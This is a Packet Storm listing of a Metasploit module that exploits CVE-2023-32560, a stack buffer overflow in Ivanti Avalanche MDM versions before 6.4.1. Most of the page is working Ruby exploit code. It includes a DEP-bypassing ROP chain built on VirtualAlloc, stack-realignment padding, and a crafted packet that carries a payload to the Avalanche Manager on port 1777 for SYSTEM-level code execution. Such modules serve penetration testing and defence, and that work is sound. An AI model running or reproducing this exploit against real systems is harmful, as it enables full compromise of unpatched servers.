what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ivanti Avalanche MDM Buffer Overflow

Ivanti Avalanche MDM Buffer Overflow
Posted Sep 18, 2023
Authored by Ege Balci | Site metasploit.com

This Metasploit module exploits a buffer overflow condition in Ivanti Avalanche MDM versions prior to 6.4.1. An attacker can send a specially crafted message to the Wavelink Avalanche Manager, which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions. This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types. The program tries to copy the item data using qmemcopy to a fixed size data buffer on stack. Upon successful exploitation the attacker gains full access to the target system. This vulnerability has been tested against Ivanti Avalanche MDM version 6.4.0.0 on Windows 10.

tags | exploit, overflow, arbitrary, code execution
systems | windows
advisories | CVE-2023-32560
SHA-256 | f923d88a736ee1b1d58c5f717428d9695cfc5a4107837de0f4006d0c4a042202

Ivanti Avalanche MDM Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ivanti Avalanche MDM Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.
An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.
This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
Upon successful exploitation the attacker gains full access to the target system.

This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.
},
'License' => MSF_LICENSE,
'Author' => [
'Ege BALCI egebalci[at]pm.me', # PoC & Msf Module
'A researcher at Tenable' # Discovery
],
'References' => [
['CVE', '2023-32560'],
['URL', 'https://www.tenable.com/security/research/tra-2023-27'],
['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']
],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' => {
'BadChars' => "\x3b"
},
'Targets' => [['Ivanti Avalanche <= v6.4.0.0', {}]],
'Privileged' => true,
'DisclosureDate' => '2023-08-14',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)

register_options(
[
OptPort.new('RPORT', [true, 'The remote Avalanche Manager port', 1777])
]
)
end

def check
begin
connect
rescue StandardError
print_error('Could not connect to target!')
return Exploit::CheckCode::Safe
end
res = sock.get_once

if res =~ /p\.guid/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end

def exploit
expected_payload_size = 622

# This is a custom ROP chain for bypassing DEP via VirtualAlloc
rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
rop_chain += [0x00001000].pack('V') # flAllocationType
rop_chain += [0x00499ac0].pack('V') # pop eax ; ret ;
rop_chain += [0x0056a208].pack('V') # VirtualAlloc IAT entry
rop_chain += [0x00566650].pack('V') # pop ecx ; ret ;
rop_chain += [0x00000040].pack('V') # flProtect
rop_chain += [0x0054b079].pack('V') # pop ebx ; ret ;
rop_chain += [0x00000320].pack('V') # dwSize
rop_chain += [0x00402323].pack('V') # pop ebp; ret
rop_chain += [0x0055642a].pack('V') # pop eax; ret
rop_chain += [0x0052ad90].pack('V') # pop esi; ret;
rop_chain += [0x0042792f].pack('V') # jmp [eax]
rop_chain += [0x00521907].pack('V') # pop edi ; ret ;
rop_chain += [0x00568968].pack('V') # ret ;
rop_chain += [0x004995ab].pack('V') # pushad ; ret ;
rop_chain += [0x00499c20].pack('V') # push esp ; ret

# Because of the compiler optimized `qmemcpy`
# we are not able to directly return to out smashed stack.
# This buffer re-arranges the entire stack for escaping
# the longass function without crashing.
buf = Rex::Text.rand_text_alpha(136)
buf += [0].pack('V') # set empty register
buf += [0].pack('V') # set empty register
buf += [0].pack('V') # stack alignment buffer
buf += [0].pack('V') # stack alignment buffer
buf += [0x00511a80].pack('V') # ESP -> $(rop: "add esp, 0x10 ; ret ;")
buf += [0x00583900].pack('V') # .data section scratch space
buf += [0x00583900].pack('V') # .data section scratch space
buf += [0x00585858].pack('V') # .data section scratch space
buf += [0x00585857].pack('V') # .data section scratch space

# ==================
name1 = 'h.mid'
value1 = "\x30"

name2 = 'h.cmd'
value2 = "\x31\x39"

name3 = 'p.waitprofile'
value3 = (buf + rop_chain + make_nops(expected_payload_size - payload.encoded.length) + payload.encoded)

item1 = [2].pack('N')
item1 += [name1.length].pack('N')
item1 += [value1.length].pack('N')
item1 += name1 + value1

item2 = [2].pack('N')
item2 += [name2.length].pack('N')
item2 += [value2.length].pack('N')
item2 += name2 + value2

item3 = [101].pack('N')
item3 += [name3.length].pack('N')
item3 += [value3.length].pack('N')
item3 += name3 + value3

hp = item1 + item2 + item3
if hp.length % 16 != 0 # Add padding if not power of 16
hp += ("\x00" * (16 - (hp.length % 16)))
end

preamble = [hp.length + 16].pack('N')
preamble += [item1.length + item2.length].pack('N')
preamble += [(hp.length + 16) - 0x3b].pack('N')
preamble += [0].pack('N')

packet = preamble + hp

print_status('Connecting to target...')
connect
res = sock.get_once
fail_with(Failure::UnexpectedReply, 'Could not connect to MDM service - no response') if res.nil?

print_status('Sending payload...')
sock.put(packet)
disconnect
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close